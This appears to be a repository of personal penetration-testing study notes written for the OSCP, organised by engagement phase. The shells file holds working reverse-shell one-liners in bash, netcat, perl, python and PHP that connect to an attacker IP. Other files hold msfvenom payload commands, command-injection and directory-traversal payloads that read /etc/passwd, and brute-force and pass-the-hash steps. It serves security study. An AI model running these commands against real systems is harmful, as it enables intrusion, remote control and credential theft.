├── 1.-reconnaissance-osint ├── sock-puppets.md ├── tools.md ├── dns.md ├── information-gathering.md ├── google-hacks.md └── cewl.md ├── 4.-exploitation ├── web-application-attacks │ ├── README.md │ ├── command-injection.md │ ├── directory-traversal.md │ ├── file-inclusion.md │ ├── cross-site-scripting.md │ └── sql-injection.md ├── finding-exploit-code.md ├── password-attacks │ ├── cewl.md │ └── README.md ├── password-attacks.md ├── metasploit.md ├── public-exploits.md ├── active-directory.md └── buffer-overflows.md ├── .gitbook └── assets │ ├── banner.png │ ├── image.png │ ├── image (1).png │ ├── image (2).png │ ├── image (3).png │ ├── image (4).png │ ├── image (5).png │ ├── image (1) (1).png │ ├── image (2) (1).png │ ├── Twitter Banner.png │ ├── twitter-banner.png │ ├── Twitter Banner (1).png │ ├── twitter-banner (1).png │ └── New Twitter background.png ├── 6.-miscellaneous └── connections.md ├── 2.-scanning ├── host-discovery.md ├── nmap-scripting-engine.md └── port-scanning-with-nmap.md ├── 3.-enumeration ├── banner-grabbing.md ├── finger-solaris.md ├── 135-rpc.md ├── 25-smtp.md ├── 111-nfs.md ├── 161-udp-snmp.md ├── 53-dns.md ├── 21-ftp.md ├── active-directory.md ├── 22-ssh.md ├── wordpress.md ├── 139-445-netbios-smb.md └── 80-443-http-s.md ├── README.md ├── 5.-maintaining-access ├── shells-1.md ├── msfvenom.md ├── shells.md ├── tunneling.md ├── file-transfers.md ├── windows-privilege-escalation.md └── linux-privilege-escalation.md ├── SUMMARY.md ├── source-zero-con-references.md └── 7.-walkthroughs ├── htb-blunder.md ├── thm-hackpark.md └── htb-haircut.md /1.-reconnaissance-osint/sock-puppets.md: -------------------------------------------------------------------------------- 1 | # Sock puppets 2 | 3 | Coming soon 4 | -------------------------------------------------------------------------------- /4.-exploitation/web-application-attacks/README.md: -------------------------------------------------------------------------------- 1 | # Web application attacks 2 | 3 | -------------------------------------------------------------------------------- /.gitbook/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/banner.png -------------------------------------------------------------------------------- /.gitbook/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/image.png -------------------------------------------------------------------------------- /.gitbook/assets/image (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/image (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/image (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/image (3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/image (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/image (5).png -------------------------------------------------------------------------------- /.gitbook/assets/image (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/image (1) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (2) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/image (2) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/Twitter Banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/Twitter Banner.png -------------------------------------------------------------------------------- /.gitbook/assets/twitter-banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/twitter-banner.png -------------------------------------------------------------------------------- /.gitbook/assets/Twitter Banner (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/Twitter Banner (1).png -------------------------------------------------------------------------------- /.gitbook/assets/twitter-banner (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/twitter-banner (1).png -------------------------------------------------------------------------------- /.gitbook/assets/New Twitter background.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/forktheplanet/Pentesting-notes/HEAD/.gitbook/assets/New Twitter background.png -------------------------------------------------------------------------------- /4.-exploitation/finding-exploit-code.md: -------------------------------------------------------------------------------- 1 | # Finding exploit code 2 | 3 | Updating searchsploit: `searchsploit -u` 4 | 5 | Finding exploits: `searchsploit slmail` 6 | 7 | [https://www.exploit-db.com/](https://www.exploit-db.com/) 8 | 9 | {% hint style="info" %} 10 | Don't forget to search GitHub. 11 | {% endhint %} 12 | 13 | -------------------------------------------------------------------------------- /1.-reconnaissance-osint/tools.md: -------------------------------------------------------------------------------- 1 | # Tools 2 | 3 | ### OWASP Amass 4 | 5 | Full featured reconnaissance tool; go to for many bounty hunters 6 | 7 | ### Recon-ng - full-featured reconnaissance framework 8 | 9 | `Whois_poc` - find POC information 10 | 11 | `XSSed` – find XSS vulnerabilities 12 | 13 | Google\_site – search for additional subdomains 14 | 15 | -------------------------------------------------------------------------------- /6.-miscellaneous/connections.md: -------------------------------------------------------------------------------- 1 | # Connections 2 | 3 | ## RDP 4 | 5 | ```text 6 | xfreerdp /u:username /p:password /cert:ignore /v:IP_ADDRESS 7 | ``` 8 | 9 | ### Alternatives 10 | 11 | * Remmina \(GUI\) 12 | 13 | ## VPN 14 | 15 | ```text 16 | openvpn filename.ovpn 17 | ``` 18 | 19 | ## IRC 20 | 21 | * Pidgin Internet Messenger \(GUI\) 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /2.-scanning/host-discovery.md: -------------------------------------------------------------------------------- 1 | # Host discovery 2 | 3 | COMING SOON 4 | 5 | ### VHOST discovery 6 | 7 | #### ffuf 8 | 9 | ``` 10 | ffuf -w wordlist.txt -u http://somesite.com -H "Host: FUZZ.somesite.com" 11 | ``` 12 | 13 | 14 | 15 | Ping sweep with nMap: 16 | 17 | ``` 18 | nmap -sn 10.11.1.1-254 19 | ``` 20 | 21 | Sweeping for specific open ports 22 | 23 | ``` 24 | nmap -p 80 10.11.1.1-254 25 | ``` 26 | -------------------------------------------------------------------------------- /3.-enumeration/banner-grabbing.md: -------------------------------------------------------------------------------- 1 | # Banner grabbing 2 | 3 | Attempting to identify service versions can be accomplished through scanning or a technique known as "banner grabbing." When banner grabbing we establish a connection to the service in question and attempt to retrieve information from the service, which often includes the version. 4 | 5 | ```text 6 | nc 10.11.1.5 4445 7 | telnet 10.10.10.10 port 8 | ``` 9 | 10 | -------------------------------------------------------------------------------- /3.-enumeration/finger-solaris.md: -------------------------------------------------------------------------------- 1 | # Finger \(Solaris\) 2 | 3 | List users 4 | 5 | ```text 6 | finger @$TargetIP 7 | ``` 8 | 9 | Query for existence of specific users 10 | 11 | ```text 12 | finger root@$TargetIP 13 | ``` 14 | 15 | Brute force enumerate users 16 | 17 | Download pentestmonkey's enumeration script: 18 | 19 | {% embed url="https://github.com/pentestmonkey/finger-user-enum" %} 20 | 21 | ```text 22 | perl finger_user_enum.pl -U /usr/share/wordlists/Users.txt -t $TargetIP 23 | ``` 24 | 25 | -------------------------------------------------------------------------------- /4.-exploitation/password-attacks/cewl.md: -------------------------------------------------------------------------------- 1 | # CeWL 2 | 3 | CeWL is a ruby tool that spiders webpages and outputs wordlists for use other brute tools. 4 | 5 | ### CeWL - scraping webpages 6 | 7 | ```text 8 | cewl [options] 9 | Example: cewl -m 6 -w megacorp-cewl.txt www.megacorpone.com 10 | -d = depth to spider, default 2 11 | -m = minimum word length, default 3 12 | -w = write the output to file, include file name 13 | -c = count, show word count for each word entry 14 | -v = verbose 15 | ``` 16 | 17 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Welcome 2 | 3 | Hello and welcome. This page started as a simple collection of notes developed while working towards the OSCP. I continue to add to the collection and make updates as I continue to learn and progress in ethical hacking. 4 | 5 | The site and resources are organized by the phases of an ethical hacking engagement. Some of these resources are more thoroughly developed, but the entire site will likely always be a work in progress. 6 | 7 | ![](<.gitbook/assets/New Twitter background.png>) 8 | 9 | -------------------------------------------------------------------------------- /1.-reconnaissance-osint/dns.md: -------------------------------------------------------------------------------- 1 | # DNS 2 | 3 | #### Enumeration 4 | 5 | ```text 6 | whois nintendo.com 7 | whois 50.7.67.186 8 | Host -t ns megacorpone.com (nameservers) 9 | Host -t mx megacorpone.com (mail servers) 10 | Host www.megacorpone.com (web server) 11 | ``` 12 | 13 | #### Zone transfers 14 | 15 | ```text 16 | host -l megacorpone.com ns1.megacorpone.com 17 | dig axfr @10.10.10.10 Domain.com 18 | ``` 19 | 20 | #### Automated tools 21 | 22 | ```text 23 | dnsrecon -d megacorpone.com -t axfr 24 | dnsenum zonetransferme.com 25 | ``` 26 | 27 | -------------------------------------------------------------------------------- /3.-enumeration/135-rpc.md: -------------------------------------------------------------------------------- 1 | # 135 - RPC 2 | 3 | ### Enumeration 4 | 5 | ``` 6 | nmap -n -v -sV -Pn -p 135 --script=msrpc-enum 192.168.1.10 7 | ``` 8 | 9 | ### rpcclient 10 | 11 | ``` 12 | rpcclient -U user $targetip 13 | rpcclient -U "" $targetip 14 | ``` 15 | 16 | ### rpcdump.py 17 | 18 | Part of the impacket suite, useful for enumerating RPC 19 | 20 | ``` 21 | /opt/impacket/examples/rpcdump.py username:password@target-ip 22 | ``` 23 | 24 | ### lookupsid.py 25 | 26 | ``` 27 | /opt/impacket/examples/lookupsid.py username:password@target-ip 28 | ``` 29 | -------------------------------------------------------------------------------- /3.-enumeration/25-smtp.md: -------------------------------------------------------------------------------- 1 | # 25 - SMTP 2 | 3 | We can attempt to enumerate SMTP by attempting to connect, then using basic commands to gather information. 4 | 5 | ### Connecting 6 | 7 | ``` 8 | nc -nv $targetip 25 9 | telnet $targetip 25 10 | ``` 11 | 12 | ### Enumeration 13 | 14 | ``` 15 | VRFY user- asks the server to verify an email address 16 | EXPN - asks the server for the membership of a mailing list 17 | ``` 18 | 19 | ### NSE Scripts 20 | 21 | ``` 22 | smtp-commands.nse -- lists available smtp commands 23 | smtp-enum-users.nse -- Attempts to enumerate users using VRFY, EXPN or RCPT TO commands 24 | smtp-open-relay.nse -- tests if authentication is required to send emails 25 | smtp-vuln-cve2010-4344.nse 26 | smtp-vuln-cve2011-1720.nse 27 | smtp-vuln-cve2011-1764.nse 28 | ``` 29 | -------------------------------------------------------------------------------- /2.-scanning/nmap-scripting-engine.md: -------------------------------------------------------------------------------- 1 | # Nmap Scripting Engine 2 | 3 | Scripts stored in: /usr/share/nmap/scripts 4 | 5 | ``` 6 | locate *.nse | grep smb 7 | ``` 8 | 9 | Banner grabbing: 10 | 11 | ``` 12 | nmap --script banner 10.10.10.5 13 | ``` 14 | 15 | Vulnerability scanning: 16 | 17 | ``` 18 | nmap -sV --script vulners [--script-args mincvss=] 19 | nmap --script vuln 10.10.10.5 20 | nmap -p 139,445 --script=$scriptname $targetip 21 | ``` 22 | 23 | With wildcards: 24 | 25 | ``` 26 | nmap -p 139,445 --script=smb-vuln* $targetip 27 | nmap -v -p 21 --script=ftp-anon.nse 10.11.1.1-254 28 | nmap -v -p 139, 445 --script=smb-security-mode 10.11.1.236 29 | ``` 30 | 31 | To learn more about specific scripts: 32 | 33 | ``` 34 | --script-help scriptname 35 | ``` 36 | -------------------------------------------------------------------------------- /3.-enumeration/111-nfs.md: -------------------------------------------------------------------------------- 1 | # 111 - NFS 2 | 3 | ### Network File System 4 | 5 | NFS is a distributed file system protocol for sharing over a network. Often used with UNIX operating systems and is predominantly insecure in its implementation. Portmapper and RPCbind both listen on port 111 and redirects clients to appropriate ports, often TCP 2049. 6 | 7 | #### Scan with nmap or use NSE scripts to locate NFS shares 8 | 9 | ``` 10 | nmap -v -p 111 10.11.1.1-254 11 | nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254 12 | ``` 13 | 14 | #### Enumeration 15 | 16 | ``` 17 | nmap -p 111 --script nfs* $RHOST 18 | nmap -sV -p 111 --script=rpcinfo $RHOST 19 | nmap -p 111 --script nfs* 10.11.1.72 20 | rpcinfo -p $targetip 21 | rpcbind $targetip 22 | ``` 23 | 24 | #### Mounting shares 25 | 26 | ``` 27 | showmount --exports $target_ip 28 | mount -o nolock $target_ip:/ /mnt 29 | ``` 30 | 31 | If files aren't readable, you may be able to create a new user, then use sed to change the UUID of the user to match the requirements (su username) 32 | -------------------------------------------------------------------------------- /4.-exploitation/web-application-attacks/command-injection.md: -------------------------------------------------------------------------------- 1 | # Command injection 2 | 3 | Command injection occurs when flaws in a web application allow the execution of OS commands. This typically occurs because inputs are not properly sanitized, allowing attackers to change or add to executed commands. 4 | 5 | * To identify potential command injection vulnerabilities, pay particular attention to functionality within web applications that is normally performed by OS commands 6 | * Use command line symbols in input fields to test for command injection 7 | * ; (used to separate commands in Bash) 8 | * \| 9 | * || (second command runs if first fails) 10 | * & 11 | * && (second command runs if first succeeds) 12 | * \> 13 | * \>> 14 | * Be sure to use commands specific to the target OS 15 | * cat vs. type 16 | * ping vs. ping -c 17 | * ls vs. dir 18 | 19 | #### Payloads 20 | 21 | ``` 22 | command; id 23 | command && whoami 24 | command || ls (or dir depending on OS) 25 | command; cat /etc/passwd 26 | command; type C:\Windows\win.ini 27 | Blind 28 | command; ping -c5 $ipaddress 29 | ``` 30 | -------------------------------------------------------------------------------- /3.-enumeration/161-udp-snmp.md: -------------------------------------------------------------------------------- 1 | # 161 (UDP) - SNMP 2 | 3 | ### Simple Network Management Protocol 4 | 5 | SNMP is commonly misunderstood resulting in misconfigurations. 6 | 7 | ``` 8 | nmap -sU --open -p 161 10.11.1.1-254 9 | onesixtyone 10.11.1.1/24 10 | ``` 11 | 12 | ### snmp-check 13 | 14 | ``` 15 | snmp-check $targetip 16 | ``` 17 | 18 | ### snmpwalk 19 | 20 | #### V1 enumeration (entire MIB tree) 21 | 22 | ``` 23 | snmpwalk -c public -v1 -t 10 $ipaddress 24 | snmpwalk -c private -v1 -t 10 $ipaddress 25 | snmpwalk -c manager -v1 -t 10 $ipaddress 26 | ``` 27 | 28 | #### Enumeration 29 | 30 | ``` 31 | snmpwalk -c public -v1 $ipaddress 1.3.6.1.4.1.77.1.2.25 (users) 32 | snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.25.1.6.0 (processes) 33 | snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.25.4.2.1.2 (running programs) 34 | snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.25.2.3.1.4 (storage units) 35 | snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.6.13.1.3 (tcp local ports) 36 | snmpwalk -c public -v1 $ipaddress 1.3.6.1.2.1.25.6.3.1.2 (software) 37 | ``` 38 | 39 | ### onesixtyone 40 | 41 | ``` 42 | onesixtyone $targetip 43 | ``` 44 | -------------------------------------------------------------------------------- /4.-exploitation/web-application-attacks/directory-traversal.md: -------------------------------------------------------------------------------- 1 | # Directory traversal 2 | 3 | Directory traversal allows attackers to gain access to files outside of the web root that should not be accessible through a web application. These attacks result in _information disclosures_ and occur when attackers are able to manipulate file paths. 4 | 5 | #### Detection 6 | 7 | Directory traversal vulnerabilities are often identified through the presence of file extensions in URLs. 8 | 9 | ``` 10 | 10.14.2.55/menu.php?file=index.php 11 | ``` 12 | 13 | If the user input is not validated, we may be able to modify the file path using "../" or "..\\", and then attempting to access system files that should not be accessible through the web application. 14 | 15 | ``` 16 | Linux - /etc/passwd 17 | Windows - c:\boot.ini 18 | Windows - c:windows\win.ini 19 | Windows - c:\windows\system32\drivers\etc\hosts 20 | ``` 21 | 22 | If input is validated, for example if dots and slashes are restricted, try URL, double URL, and Unicode encoding to bypass these filters. 23 | 24 | ``` 25 | URL encoding: %2e%2e%2ef%2e%2e%2e%2f%2e%2e%2fetc%2fpasswd 26 | ``` 27 | -------------------------------------------------------------------------------- /5.-maintaining-access/shells-1.md: -------------------------------------------------------------------------------- 1 | # Shells 2 | 3 | {% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" %} 4 | 5 | ### Bash 6 | 7 | ```text 8 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 9 | ``` 10 | 11 | ### Netcat 12 | 13 | ```text 14 | nc -e /bin/sh 10.0.0.1 1234 15 | ``` 16 | 17 | ### Netcat \(without -e\) 18 | 19 | ```text 20 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f 21 | ``` 22 | 23 | ### Perl 24 | 25 | ```text 26 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 27 | ``` 28 | 29 | ### Python 30 | 31 | ```text 32 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 33 | ``` 34 | 35 | ### PHP 36 | 37 | ```text 38 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 39 | 40 | '& /dev/tcp/192.168.119.124/4445 0>&1\"\'); ?>' 41 | ``` 42 | 43 | -------------------------------------------------------------------------------- /5.-maintaining-access/msfvenom.md: -------------------------------------------------------------------------------- 1 | # MSFvenom 2 | 3 | ### Commands 4 | 5 | ```text 6 | -p Selects the payload 7 | -l List modules (payloads, encoders, nops, all) 8 | -n Prepend a nop sled to the payload 9 | -f Output format 10 | -e Encoder 11 | -s Maximum space for the payload 12 | -a Architecture 13 | -b Bad characters 14 | --platform Platform 15 | ``` 16 | 17 | #### Windows staged payloads 18 | 19 | ```text 20 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe 21 | msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe 22 | ``` 23 | 24 | #### Windows non-staged payloads 25 | 26 | ```text 27 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe 28 | msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe 29 | ``` 30 | 31 | #### Meterpreter payloads 32 | 33 | ```text 34 | Msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe 35 | ``` 36 | 37 | Using ExitThread instead of ExitProcess can help prevent crashing the program 38 | 39 | ```text 40 | Msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.4 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b “\x00\x0a\x0d” 41 | ``` 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /5.-maintaining-access/shells.md: -------------------------------------------------------------------------------- 1 | # Upgrading simple shells 2 | 3 | ### Spawning TTY 4 | 5 | If Python is present on the target machine, the first method below is very reliable. Otherwise, the other options are worth trying but don't always work. 6 | 7 | ```text 8 | python -c "import pty; pty.spawn('/bin/bash')" 9 | ``` 10 | 11 | {% hint style="info" %} 12 | Be sure to check for other versions of Python! 13 | {% endhint %} 14 | 15 | ```text 16 | echo os.system('/bin/bash') 17 | ``` 18 | 19 | ```text 20 | /bin/sh -i 21 | ``` 22 | 23 | ### Tab auto completion 24 | 25 | The following commands will give tab autocompletion, but other features such as SIGINT, history, and clear screen will not work. 26 | 27 | ```text 28 | CTRL + Z (background the session) 29 | stty raw -echo 30 | fg 31 | reset 32 | ``` 33 | 34 | ### Full TTY 35 | 36 | The following commands will correct formatting errors and provide the remaining features including SIGINT, history, and the ability to clear your screen. 37 | 38 | ```text 39 | # on attack machine 40 | stty -a (note number of rows and columns) 41 | echo $TERM 42 | 43 | #on target machine 44 | export TERM=xterm-256color (match term from attack machine) 45 | stty row XX columns XXX (match from attack machine) 46 | 47 | echo $SHELL -- if not bash, export SHELL=bash 48 | ``` 49 | 50 | -------------------------------------------------------------------------------- /3.-enumeration/53-dns.md: -------------------------------------------------------------------------------- 1 | # 53 - DNS 2 | 3 | ### Enumeration 4 | 5 | Note: Many of the techniques accomplished below can also be accomplished using DNS repositories, such as [DNSdumpster.com ](https://dnsdumpster.com/) 6 | 7 | ### **nslookup** 8 | 9 | ``` 10 | nslookup $domain.com 11 | nslookup $ipaddress (reverse lookup) 12 | ``` 13 | 14 | ### dig 15 | 16 | ``` 17 | Basic syntax: dig @ somesite.com options 18 | dig somesite.com -t any (all available records) 19 | dig somesite.com -t mx (mx records only) 20 | dig somesite.com -t axfr (zone transfer) 21 | dig -x $ipaddress (reverse lookup) 22 | ``` 23 | 24 | ### host 25 | 26 | ``` 27 | Host www.somesite.com (web server) 28 | Host -t ns somesite.com (nameservers) 29 | Host -t mx somesite.com (mail servers) 30 | host -l (zone transfer) 31 | ``` 32 | 33 | ### Automated tools 34 | 35 | #### DNSRECON 36 | 37 | ``` 38 | dnsrecon -d somesite.com -t axfr 39 | dnsrecon -r CIDR (reverse DNS lookup of net block) 40 | -d: used to specify domain name 41 | -r: IP range for reverse lookup 42 | -t: used to specify the type of enumeration 43 | Common types include: 44 | std - SOA, NS, A, AAAA, MX and SRV 45 | axfr - test all nameservers for zone transfer 46 | brt - brute force domains and hosts using a given dictionary 47 | ``` 48 | 49 | #### DNSenum 50 | 51 | ``` 52 | dnsenum $domain.com 53 | ``` 54 | -------------------------------------------------------------------------------- /3.-enumeration/21-ftp.md: -------------------------------------------------------------------------------- 1 | # 21 - FTP 2 | 3 | FTP versions are typically fairly secure. Check for anonymous login capability, if present enumerate whatever you have access to. 4 | 5 | * Version info \(banner grab\) 6 | * Anonymous logins - surprisingly common, especially in CTFs 7 | 8 | ```text 9 | ftp 10.11.1.5 10 | ``` 11 | 12 | {% hint style="warning" %} 13 | Remember to place FTP into the proper mode when transferring files \(binary for executable files and ASCII for text documents. Use "binary" and "ascii" to change modes. 14 | {% endhint %} 15 | 16 | #### Basic Commands 17 | 18 | FTP uses many basic Linux commands, below are the most common. 19 | 20 | ```text 21 | ls - list directory contents 22 | cd - change directory 23 | get - copy file from remote to local 24 | mget - copy multiple files from remote to local 25 | put - copy file from local to remote 26 | mput - copy multiple files from local to remote 27 | delete - remove a file 28 | pwd - print working directory on remote machine 29 | bye/quit - exit ftp 30 | ``` 31 | 32 | #### Moving files 33 | 34 | Some FTP servers \(ProFTPd\) are misconfigured and allow you to move files without authenticating. If your enumeration uncovers file locations, you can use the commands below to try to move these files from inaccessible locations to areas you may have access to \(smb shares, NFS, etc.\). 35 | 36 | ```text 37 | SITE CPFR /path/to/file.txt 38 | SITE CPTO /path/you/choose/file.txt 39 | ``` 40 | 41 | -------------------------------------------------------------------------------- /5.-maintaining-access/tunneling.md: -------------------------------------------------------------------------------- 1 | # Tunneling/Port Forwarding 2 | 3 | ### Linux 4 | 5 | #### Local port forwarding 6 | 7 | ``` 8 | ssh -L :: 9 | ``` 10 | 11 | #### Remote port forwarding 12 | 13 | ``` 14 | ssh -R :: 15 | ``` 16 | 17 | #### Dynamic port forwarding 18 | 19 | ``` 20 | ssh -D -p 21 | ``` 22 | 23 | HTTP tunneling – technique to encapsulate a protocol within HTTP 24 | 25 | ``` 26 | HTTPTunnel or stunnel 27 | ``` 28 | 29 | ### Windows 30 | 31 | #### Netsh 32 | 33 | Netsh is installed on Windows by default, but requires the IP Helper service and IPv6 must be installed (both enabled by default). 34 | 35 | ``` 36 | netsh interface portproxy add v4tov4 listenport=$port listenaddress=$ip connectport=$port connectaddress=$ip 37 | ``` 38 | 39 | {% hint style="info" %} 40 | A firewall rule may be required to open the desired port. 41 | {% endhint %} 42 | 43 | ``` 44 | netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=$ip localport=$port action=allow 45 | ``` 46 | 47 | #### Plink.exe 48 | 49 | ``` 50 | plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4 51 | ``` 52 | 53 | ``` 54 | plink.exe -l root -pw mysecretpassword 192.168.0.101 -R 8080:127.0.0.1:8080 55 | ``` 56 | 57 | ### Meterpreter 58 | 59 | ``` 60 | portfwd add -l -p -r 61 | portfwd add -l 3306 -p 3306 -r 192.168.1.10 62 | ``` 63 | 64 | -------------------------------------------------------------------------------- /4.-exploitation/password-attacks.md: -------------------------------------------------------------------------------- 1 | # Password attacks 2 | 3 | #### `usr/share/wordlists` 4 | 5 | ### Medusa 6 | 7 | Brute force basic http authorizations. 8 | 9 | ``` 10 | medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10 11 | ``` 12 | 13 | ### Hydra 14 | 15 | Can be used to brute force numerous services. 16 | 17 | ``` 18 | hydra -P password.txt -v 10.11.1.210 snmp 19 | hydra -l admin -P password.txt -v 122.168.31.219 ftp 20 | hydra -l root -P password.txt 10.11.1.219 ssh 21 | hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin 22 | ``` 23 | 24 | #### \*\* Brute force http-post login forms 25 | 26 | ``` 27 | Format: hydra -L -P http-post-form “::" 28 | 29 | Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!" 30 | ``` 31 | 32 | ### John the Ripper 33 | 34 | ``` 35 | john --wordlist=/usr/share/wordlists/rockyou.txt 36 | ``` 37 | 38 | #### SSH keys 39 | 40 | To crack SSH key passwords convert the key to a hash, then crack using John. 41 | 42 | ``` 43 | python ssh2john.py id_rsa > id_rsa.hash 44 | ``` 45 | 46 | ### Hashcat 47 | 48 | **Check for mode on wiki page** [https://hashcat.net/wiki/doku.php?id=example\_hashes](https://hashcat.net/wiki/doku.php?id=example\_hashes) 49 | 50 | ``` 51 | hashcat -m (mode) -a 0 hash.txt Pass.txt 52 | ``` 53 | 54 | ### Passing the hash (Windows) 55 | 56 | Create environment variable SMBHASH, containing hash we want to pass 57 | 58 | `export SMBHASH=hashvalue` 59 | 60 | `Use pth-winexe to authenticate: pth-winexe -U administrator% //10.11.0.1.76.cmd` 61 | -------------------------------------------------------------------------------- /4.-exploitation/password-attacks/README.md: -------------------------------------------------------------------------------- 1 | # Password attacks 2 | 3 | #### `usr/share/wordlists` 4 | 5 | ### Medusa 6 | 7 | Brute force basic http authorizations. 8 | 9 | ```text 10 | medusa -h 10.11.1.219 -u admin -P password.txt -M http -m DIR:/admin -T 10 11 | ``` 12 | 13 | ### Hydra 14 | 15 | Can be used to brute force numerous services. 16 | 17 | ```text 18 | hydra -P password.txt -v 10.11.1.210 snmp 19 | hydra -l admin -P password.txt -v 122.168.31.219 ftp 20 | hydra -l root -P password.txt 10.11.1.219 ssh 21 | hydra -L users.txt -P password.txt 10.10.219.253 www-get /admin 22 | ``` 23 | 24 | #### \*\* Brute force http-post login forms 25 | 26 | ```text 27 | Format: hydra -L -P http-post-form “::" 28 | 29 | Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!" 30 | ``` 31 | 32 | ### John 33 | 34 | ```text 35 | john --wordlist=/usr/share/wordlists/rockyou.txt 36 | ``` 37 | 38 | #### SSH keys 39 | 40 | To crack SSH key passwords convert the key to a hash, then crack using John. 41 | 42 | ```text 43 | python ssh2john.py id_rsa > id_rsa.hash 44 | ``` 45 | 46 | ### Hashcat 47 | 48 | **Check for mode on wiki page** [https://hashcat.net/wiki/doku.php?id=example\_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) 49 | 50 | ```text 51 | hashcat -m (mode) -a 0 hash.txt Pass.txt 52 | ``` 53 | 54 | ### Passing the hash \(Windows\) 55 | 56 | Create environment variable SMBHASH, containing hash we want to pass 57 | 58 | `export SMBHASH=hashvalue` 59 | 60 | `Use pth-winexe to authenticate: pth-winexe -U administrator% //10.11.0.1.76.cmd` 61 | 62 | -------------------------------------------------------------------------------- /2.-scanning/port-scanning-with-nmap.md: -------------------------------------------------------------------------------- 1 | # Port Scanning with Nmap 2 | 3 | Nmap is easily one of the most popular penetration testing tools. While it started as a simple port scanner, the tool has grown immensely and is now performs multiple functions. Knowing how to utilize Nmap's options to produce the desired level of detail in your scans is incredibly useful. Below are some example scan commands, as well as a list of the most commonly used options. 4 | 5 | #### My preferred scans 6 | 7 | ``` 8 | Quick/standard scan: nmap -sC -sV 10.11.1.5 9 | Deep scan: nmap -p- -sC -sV 10.11.1.5 10 | UDP scan: nmap -sU -F 10.11.1.5 11 | ``` 12 | 13 | #### Scan types 14 | 15 | ``` 16 | -sT = TCP connect scan 17 | -sS = TCP SYN (stealth) scan 18 | -sU = UDP scan 19 | -sn = host discovery only (no port scan) 20 | -sN = null scann (no flags set, may help on firewalled systems) 21 | -sX = Xmas tree scan (FIN, PSH, URG flags) 22 | ``` 23 | 24 | #### Other important flags 25 | 26 | ``` 27 | -sC = runs default scripts 28 | -sV = attempts to identify the version of the service running on a port 29 | -O = attempts OS detection using TCP/IP fingerprinting 30 | -A = includes -sC, -sV, -O 31 | -p = used to specify ports 32 | -p- = scans all ports, not just top 1,000 default ports 33 | --top-ports=20 = will scan the top 20 ports, number can be specified 34 | -Pn = skip host discovery 